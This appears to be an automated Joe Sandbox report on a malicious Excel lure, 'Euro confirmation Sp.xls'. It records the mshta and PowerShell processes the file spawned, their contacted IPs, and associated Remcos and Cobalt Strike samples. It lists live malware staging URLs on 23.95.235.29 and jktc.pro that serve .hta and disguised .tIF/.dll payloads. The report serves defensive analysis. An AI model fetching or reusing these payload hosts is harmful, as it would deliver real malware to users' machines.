http://www.diginotar.nl/cps/pkioverheid0	mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jktc.pro/5	mshta.exe, 00000004.00000003.437054940.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440382828.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jktc.pro/:	mshta.exe, 00000004.00000003.437054940.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440382828.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micros	powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.usertru	mshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dll-	powershell.exe, 00000007.00000002.457796037.0000000000441000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFp	powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	false		high
https://res.cloudinary.com	powershell.exe, 0000000D.00000002.518019597.00000000024A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002412000.00000004.00000800.00020000.00000000.sdmp	false		high
http://23.95.235.29/90/veryniceb	powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htant=gre	mshta.exe, 00000004.00000002.440382828.000000000044E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.00000000002CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jktc.pro/	mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmp	false		high
http://23.95.235.29/	mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFC:	powershell.exe, 00000007.00000002.465103812.000000001A950000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.501446236.000000001AD84000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFY	powershell.exe, 00000007.00000002.457796037.0000000000441000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jktc.pro/1.a2M	mshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/L9a2M	mshta.exe, 0000000F.00000003.487428731.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaC:	mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000007.00000002.458485050.0000000002531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.518019597.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000023BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002211000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	false		high
http://go.cr	powershell.exe, 00000007.00000002.465465325.000000001C4A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dll	powershell.exe, 00000013.00000002.494069922.000000000041F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htareen&t	mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.95.235.29	unknown	United States	36352	AS-COLOCROSSINGUS	true
151.101.1.137	cloudinary.map.fastly.net	United States	54113	FASTLYUS	false
172.67.163.184	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.34.183	jktc.pro	United States	13335	CLOUDFLARENETUS	false
151.101.65.137	unknown	United States	54113	FASTLYUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574071
Start date and time:	2024-12-12 21:36:49 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Sample name:	Euro confirmation Sp.xls
Detection:	MAL
Classification:	mal100.phis.troj.expl.evad.winXLS@29/38@23/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 10 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.17.202.1, 104.17.201.1
Excluded domains from analysis (whitelisted): resc.cloudinary.com.cdn.cloudflare.net
Execution Graph export aborted for target mshta.exe, PID 2692 because there are no executed function
Execution Graph export aborted for target mshta.exe, PID 3880 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Euro confirmation Sp.xls

Simulations

Behavior and APIs

Time	Type	Description
15:38:13	API Interceptor	135x Sleep call for process: mshta.exe modified
15:38:19	API Interceptor	225x Sleep call for process: powershell.exe modified
15:38:29	API Interceptor	23x Sleep call for process: wscript.exe modified

LLM Input / Output

Input	Output
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Description of Product 1", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Euro confirmation Sp [Compatibility Mode]", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PURCHASE ORDER", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PURCHASE ORDER", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PURCHASE ORDER", "prominent_button_name": "unknown", "text_input_field_labels": [ "Order Code", "Item", "Qty", "Units", "Unit Price", "Total Price" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 1 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PURCHASE ORDER", "prominent_button_name": "unknown", "text_input_field_labels": [ "Order Code", "Item", "Qty", "Units", "Unit Price", "Total Price" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PURCHASE ORDER", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PURCHASE ORDER", "prominent_button_name": "unknown", "text_input_field_labels": [ "Country", "Attn: Contact Person", "Attn: Contact Person", "Order Code", "Item", "Qty", "Units", "Unit Price", "Total Price" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 1 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.95.235.29	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF
	invoice09850.xls	Get hash	malicious	Remcos	Browse	23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
151.101.1.137	stage2.ps1	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse
	Invoice A037.xls	Get hash	malicious	Unknown	Browse
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse
	16547.js	Get hash	malicious	MassLogger RAT	Browse
	#U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx	Get hash	malicious	Remcos	Browse
	nr101612_Order.wsf	Get hash	malicious	Remcos	Browse
	1013911.js	Get hash	malicious	FormBook	Browse
	http://itsecurityupdate.com	Get hash	malicious	Unknown	Browse
172.67.163.184	4lXTg8P7Ih.elf	Get hash	malicious	Mirai	Browse	/tmUnblock.cgi

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cloudinary.map.fastly.net	stage2.ps1	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	151.101.193.137
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.1.137
	invoice09850.xls	Get hash	malicious	Remcos	Browse	151.101.65.137
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	151.101.1.137
	Plugin81139.js	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	151.101.129.137
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	151.101.129.137
	New Order Enquiry.js	Get hash	malicious	AgentTesla	Browse	151.101.193.137
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	151.101.65.137
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	151.101.65.137
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse	151.101.1.137
jktc.pro	510005940.docx.doc	Get hash	malicious	Unknown	Browse	104.21.34.183
jktc.pro	510005940.docx.doc	Get hash	malicious	Unknown	Browse	172.67.163.184
paste.ee	print preview.js	Get hash	malicious	FormBook	Browse	172.67.187.200
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	invoice09850.xls	Get hash	malicious	Remcos	Browse	188.114.97.6
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	104.21.84.67
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	188.114.96.6
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse	172.67.187.200

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	https://es-proposal.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Stealc, Vidar	Browse	151.101.193.91
	https://morgans-proposal-site.webflow.io/	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	151.101.66.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.com	Get hash	malicious	Unknown	Browse	151.101.194.137
CLOUDFLARENETUS	WO-663071 Sabiya Power Station Project.vbs	Get hash	malicious	Remcos	Browse	162.159.129.233
	ltT8eZaqtZ.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	172.67.216.167
	htZgRRla8S.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.206.64
	0TGy7VIqx7CSab5o.lNK.lnk	Get hash	malicious	Unknown	Browse	172.67.185.252
	https://es-proposal.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	104.21.112.1
	http://ebaumsworld.com	Get hash	malicious	Unknown	Browse	104.17.159.113
	https://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse	104.18.20.58
	http://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse	104.18.21.58
	https://morgans-proposal-site.webflow.io/	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	172.64.151.8
	https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.com	Get hash	malicious	Unknown	Browse	104.17.25.14
AS-COLOCROSSINGUS	SwiftCopy_PaymtRecpt121224.exe	Get hash	malicious	Remcos	Browse	192.210.150.17
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.245.142.60
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	192.3.101.149
	invoice09850.xls	Get hash	malicious	Remcos	Browse	192.3.101.149
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	23.95.235.29
CLOUDFLARENETUS	WO-663071 Sabiya Power Station Project.vbs	Get hash	malicious	Remcos	Browse	162.159.129.233
	ltT8eZaqtZ.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	172.67.216.167
	htZgRRla8S.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.206.64
	0TGy7VIqx7CSab5o.lNK.lnk	Get hash	malicious	Unknown	Browse	172.67.185.252
	https://es-proposal.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	104.21.112.1
	http://ebaumsworld.com	Get hash	malicious	Unknown	Browse	104.17.159.113
	https://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse	104.18.20.58
	http://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse	104.18.21.58
	https://morgans-proposal-site.webflow.io/	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	172.64.151.8
	https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.com	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	510005940.docx.doc	Get hash	malicious	Unknown	Browse	151.101.1.137 151.101.65.137
	invoice09850.xls	Get hash	malicious	Remcos	Browse	151.101.1.137 151.101.65.137
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	151.101.1.137 151.101.65.137
	Request for quote.doc	Get hash	malicious	Snake Keylogger	Browse	151.101.1.137 151.101.65.137
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	151.101.1.137 151.101.65.137
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	151.101.1.137 151.101.65.137
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	151.101.1.137 151.101.65.137
	Payment Confirmation..docm	Get hash	malicious	Snake Keylogger	Browse	151.101.1.137 151.101.65.137
	Potvrda_o_uplati.docx.doc	Get hash	malicious	Unknown	Browse	151.101.1.137 151.101.65.137
	Estado de cuenta.xls	Get hash	malicious	XenoRAT	Browse	151.101.1.137 151.101.65.137
7dcce5b76c8b17472d024758970a406b	510005940.docx.doc	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	Document.xla	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	xeroxscan.Docx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	xeroxscan.Docx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	invoice09850.xls	Get hash	malicious	Remcos	Browse	104.21.34.183 172.67.163.184
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	tqkdMdv2zO.doc	Get hash	malicious	XenoRAT	Browse	104.21.34.183 172.67.163.184
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	Estado.de.cuenta.xls	Get hash	malicious	AveMaria, UACMe	Browse	104.21.34.183 172.67.163.184

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	15189
Entropy (8bit):	5.0343247648743
Encrypted:	false
SSDEEP:	384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
MD5:	7BC3FB6565E144A52C5F44408D5D80DF
SHA1:	C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
SHA-256:	EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
SHA-512:	D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
Category:	modified
Size (bytes):	82534
Entropy (8bit):	2.63019013871546
Encrypted:	false
SSDEEP:	768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHAgxLiFZpd0LTna8/GdHz6kXd0LcRPi+Bkqr93:tL
